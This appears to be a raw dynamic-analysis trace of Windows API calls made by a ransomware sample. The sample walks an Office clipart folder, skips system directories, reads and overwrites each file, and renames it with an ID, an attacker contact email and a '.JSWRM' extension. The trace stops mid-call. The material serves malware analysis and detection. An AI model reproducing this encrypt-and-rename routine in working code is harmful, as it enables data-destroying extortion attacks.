WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01167_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01167_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01167_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0076.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.367] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2080) returned 1 [0076.367] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.367] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x820) returned 0x23fc98 [0076.367] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x820, lpOverlapped=0x0) returned 1 [0076.369] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.369] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x820, lpOverlapped=0x0) returned 1 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.370] CloseHandle (hObject=0x314) returned 1 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0076.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0076.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.370] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01167_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01167_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0076.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.371] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7d4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01168_.WMF", cAlternateFileName="")) returned 1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2=".") returned 1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="..") returned 1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="...") returned 1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="windows") returned -1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="recovery") returned -1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="perflogs") returned -1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="documents and settings") returned -1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="system volume information") returned -1 [0076.371] lstrcmpiW (lpString1="DD01168_.WMF", lpString2="msocache") returned -1 [0076.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01168_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01168_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01168_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0076.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01168_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01168_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01168_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0076.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.371] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.371] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.372] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2004) returned 1 [0076.372] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.372] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7d0) returned 0x23fc98 [0076.372] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x7d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x7d0, lpOverlapped=0x0) returned 1 [0076.374] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.374] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x7d0, lpOverlapped=0x0) returned 1 [0076.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.374] CloseHandle (hObject=0x314) returned 1 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0076.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0076.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0076.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0076.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01168_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01168_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0076.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.375] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb96b67, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb96b67, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01169_.WMF", cAlternateFileName="")) returned 1 [0076.375] lstrcmpiW (lpString1="DD01169_.WMF", lpString2=".") returned 1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="..") returned 1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="...") returned 1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="windows") returned -1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="recovery") returned -1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="perflogs") returned -1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="documents and settings") returned -1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="system volume information") returned -1 [0076.376] lstrcmpiW (lpString1="DD01169_.WMF", lpString2="msocache") returned -1 [0076.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01169_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01169_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01169_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0076.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01169_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01169_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01169_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0076.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.376] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2020) returned 1 [0076.376] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e0) returned 0x23fc98 [0076.377] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x7e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x7e0, lpOverlapped=0x0) returned 1 [0076.378] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.378] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x7e0, lpOverlapped=0x0) returned 1 [0076.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0076.378] CloseHandle (hObject=0x314) returned 1 [0076.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0076.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0076.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0076.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.379] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01169_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01169_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.379] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x964, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01170_.WMF", cAlternateFileName="")) returned 1 [0076.379] lstrcmpiW (lpString1="DD01170_.WMF", lpString2=".") returned 1 [0076.379] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="..") returned 1 [0076.379] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="...") returned 1 [0076.379] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="windows") returned -1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="recovery") returned -1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="perflogs") returned -1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="documents and settings") returned -1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="system volume information") returned -1 [0076.380] lstrcmpiW (lpString1="DD01170_.WMF", lpString2="msocache") returned -1 [0076.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01170_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01170_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01170_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01170_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0076.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.380] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2404) returned 1 [0076.380] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 